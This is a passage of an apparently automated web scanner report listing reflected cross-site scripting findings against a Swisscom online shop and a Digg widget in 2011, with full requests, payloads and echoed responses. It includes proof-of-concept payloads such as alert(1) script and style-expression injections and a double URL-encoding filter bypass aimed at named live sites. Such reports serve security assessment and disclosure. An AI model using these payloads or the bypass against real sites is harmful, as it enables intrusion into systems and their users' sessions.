Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CTQ=second; CP=null*; s_cc=true; s_nr=1303671316760-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/os_festnetz/os_telefone/products%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx%25253Fcat%25253DOS_Fe%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:25:53 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 65706


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
    Swisscom
...[SNIP]...
ve each page an identifying name, server, and channel on
the next lines. */
s.pageName="pages/productconfig/productconfig.aspx"
s.server="SW1297P"
s.channel="os_festnetz:os_telefone1d8ff";ec76a0eadf7"
s.pageType=""
s.prop1="OS_Festnetz"
s.prop2="OS_Festnetz:OS_Telefone1d8ff";ec76a0eadf7"
s.prop3="OS_Festnetz:OS_Telefone1d8ff";ec76a0eadf7"
s.prop4=""
s.prop5=""
s.
...[SNIP]...

6.254. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx [subcat parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/ProductConfig/ProductConfig.aspx

Issue detail

The value of the subcat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9235"%20a%3db%20ab5229d1d80 was submitted in the subcat parameter. This input was echoed as a9235" a=b ab5229d1d80 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /onlineshop/Pages/ProductConfig/ProductConfig.aspx?cat=OS_Festnetz&subcat=OS_Telefonea9235"%20a%3db%20ab5229d1d80&drilldown=7&lang=EN&nsextt=&id=1000299810 HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&lang=EN&nsextt=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CTQ=second; CP=null*; s_cc=true; s_nr=1303671316760-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/os_festnetz/os_telefone/products%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx%25253Fcat%25253DOS_Fe%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:25:37 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 65783


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
    Swisscom
...[SNIP]...
<a href="http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx?cat=OS_Festnetz&subcat=OS_Telefonea9235" a=b ab5229d1d80&drilldown=7&nsextt=&id=1000299810&lang=de&plang=de">
...[SNIP]...

6.255. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductDetail/ProductDetail.aspx [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/ProductDetail/ProductDetail.aspx

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e0c5%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252209e2433f2de was submitted in the id parameter. This input was echoed as 7e0c5"style="x:expression(alert(1))"09e2433f2de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /onlineshop/Pages/ProductDetail/ProductDetail.aspx?cat=OS_Festnetz(MasterProducts)&subcat=OS_Fax(MasterProducts)&drilldown=4&subsubcat=OS_Normalpapier_Fax(MasterProducts)&id=000000000000125092(MasterProducts)7e0c5%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252209e2433f2de&lang=EN HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Fax&drilldown=3
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CP=null*; s_cc=true; CTQ=second; s_nr=1303671130460-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/os_festnetz/os_fax/category%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductDetail/ProductDetail.aspx%25253Fcat%25253DOS_Fe%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:58:07 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 50645


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Swisscom O
...[SNIP]...
<a href="http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/CustomError/CustomError.aspx?ErrorMessageId=Error.Product.NotFound&ErrorMessageParam=0000000000001250927e0c5"style="x:expression(alert(1))"09e2433f2de&lang=de&plang=de">
...[SNIP]...

6.256. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductDetail/ProductDetail.aspx [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/ProductDetail/ProductDetail.aspx

Issue detail

The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28f93%2527%252dalert%25281%2529%252d%252733d03a9f05b was submitted in the id parameter. This input was echoed as 28f93'-alert(1)-'33d03a9f05b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /onlineshop/Pages/ProductDetail/ProductDetail.aspx?cat=OS_Festnetz(MasterProducts)&subcat=OS_Fax(MasterProducts)&drilldown=4&subsubcat=OS_Normalpapier_Fax(MasterProducts)&id=000000000000125092(MasterProducts)28f93%2527%252dalert%25281%2529%252d%252733d03a9f05b&lang=EN HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Fax&drilldown=3
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CP=null*; s_cc=true; CTQ=second; s_nr=1303671130460-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/os_festnetz/os_fax/category%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductDetail/ProductDetail.aspx%25253Fcat%25253DOS_Fe%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:58:35 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 49686


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Swisscom O
...[SNIP]...
fJumbToTop.aspx%3fhttp%3a%2f%2fswisscomonlineshop.sso.bluewin.ch%2fonlineshop%2fPages%2fCustomError%2fCustomError.aspx%3fErrorMessageId%3dError.Product.NotFound%26ErrorMessageParam%3d00000000000012509228f93'-alert(1)-'33d03a9f05b%26lang%3den" frameborder="0" scrolling="no" />
...[SNIP]...

6.257. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx [drilldown parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/Products/Products.aspx

Issue detail

The value of the drilldown request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ef7d"%20a%3db%203e908d56977 was submitted in the drilldown parameter. This input was echoed as 5ef7d" a=b 3e908d56977 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /onlineshop/Pages/Products/Products.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=75ef7d"%20a%3db%203e908d56977&lang=EN&nsextt= HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=3&lang=EN&nsextt=%22%20stYle=%22x:expre/**/ssion(netsparker(9))
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CTQ=second; CP=null*; s_cc=true; s_nr=1303671308852-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/os_festnetz/os_telefone/category%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx%25253Fcat%25253DOS_Festnetz%252526sub%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:20:42 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 106580


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Fixed netw
...[SNIP]...
<a href="http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=75ef7d" a=b 3e908d56977&nsextt=&lang=de&plang=de">
...[SNIP]...

6.258. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/Products/Products.aspx

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7448"%20a%3db%204ca61d05dce was submitted in the lang parameter. This input was echoed as d7448" a=b 4ca61d05dce in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /onlineshop/Pages/Products/Products.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&lang=ENd7448"%20a%3db%204ca61d05dce&nsextt= HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=3&lang=EN&nsextt=%22%20stYle=%22x:expre/**/ssion(netsparker(9))
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CTQ=second; CP=null*; s_cc=true; s_nr=1303671308852-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/os_festnetz/os_telefone/category%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx%25253Fcat%25253DOS_Festnetz%252526sub%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:21:47 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 105256


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Fixed netw
...[SNIP]...
<a href="/onlineshop/Pages/ProductDetail/ProductDetail.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&lang=ENd7448" a=b 4ca61d05dce&nsextt=&id=1000299810">
...[SNIP]...

6.259. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/Products/Products.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66275"%20a%3db%2098ed21a86df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66275" a=b 98ed21a86df in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /onlineshop/Pages/Products/Products.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&lang=EN&nsextt=&66275"%20a%3db%2098ed21a86df=1 HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=3&lang=EN&nsextt=%22%20stYle=%22x:expre/**/ssion(netsparker(9))
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CTQ=second; CP=null*; s_cc=true; s_nr=1303671308852-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/os_festnetz/os_telefone/category%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx%25253Fcat%25253DOS_Festnetz%252526sub%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:25:25 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 106993


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Fixed netw
...[SNIP]...
<a href="http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&nsextt=&66275" a=b 98ed21a86df=1&lang=de&plang=de">
...[SNIP]...

6.260. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/Products/Products.aspx

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e933"%20a%3db%2008982561997 was submitted in the nsextt parameter. This input was echoed as 1e933" a=b 08982561997 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /onlineshop/Pages/Products/Products.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&lang=EN&nsextt=1e933"%20a%3db%2008982561997 HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=3&lang=EN&nsextt=%22%20stYle=%22x:expre/**/ssion(netsparker(9))
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CTQ=second; CP=null*; s_cc=true; s_nr=1303671308852-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/os_festnetz/os_telefone/category%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx%25253Fcat%25253DOS_Festnetz%252526sub%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:22:14 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 106756


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Fixed netw
...[SNIP]...
<a href="http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&nsextt=1e933" a=b 08982561997&lang=de&plang=de">
...[SNIP]...

6.261. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx [subcat parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/Products/Products.aspx

Issue detail

The value of the subcat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b24cf"%20a%3db%20e0220ee976a was submitted in the subcat parameter. This input was echoed as b24cf" a=b e0220ee976a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /onlineshop/Pages/Products/Products.aspx?cat=OS_Festnetz&subcat=OS_Telefoneb24cf"%20a%3db%20e0220ee976a&drilldown=7&lang=EN&nsextt= HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=3&lang=EN&nsextt=%22%20stYle=%22x:expre/**/ssion(netsparker(9))
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CTQ=second; CP=null*; s_cc=true; s_nr=1303671308852-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/os_festnetz/os_telefone/category%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx%25253Fcat%25253DOS_Festnetz%252526sub%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:19:51 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 49989


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Fixed netw
...[SNIP]...
<a href="http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx?cat=OS_Festnetz&subcat=OS_Telefoneb24cf" a=b e0220ee976a&drilldown=7&nsextt=&lang=de&plang=de">
...[SNIP]...

6.262. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx [subcat parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/Products/Products.aspx

Issue detail

The value of the subcat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 323a2"%3b7f2cbab25be was submitted in the subcat parameter. This input was echoed as 323a2";7f2cbab25be in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /onlineshop/Pages/Products/Products.aspx?cat=OS_Festnetz&subcat=OS_Telefone323a2"%3b7f2cbab25be&drilldown=7&lang=EN&nsextt= HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=3&lang=EN&nsextt=%22%20stYle=%22x:expre/**/ssion(netsparker(9))
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CTQ=second; CP=null*; s_cc=true; s_nr=1303671308852-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/os_festnetz/os_telefone/category%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx%25253Fcat%25253DOS_Festnetz%252526sub%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:20:05 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 49912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Fixed netw
...[SNIP]...
You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="pages/products/products.aspx"
s.server="SW1297P"
s.channel="os_festnetz:os_telefone323a2";7f2cbab25be"
s.pageType=""
s.prop1="OS_Festnetz"
s.prop2="OS_Festnetz:OS_Telefone323a2";7f2cbab25be"
s.prop3="OS_Festnetz:OS_Telefone323a2";7f2cbab25be"
s.prop4=""
s.prop5=""
s.
...[SNIP]...

6.263. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload e685f<script>alert(1)</script>8d158132c29 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///C%3A/cdn/2011/04/23/dork/nextadvisorcom/reflected-xss-directory-traversal-file-inclusion-dork-ghdb-example-poc-report.htmle685f<script>alert(1)</script>8d158132c29 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Sun, 24 Apr 2011 04:06:47 GMT
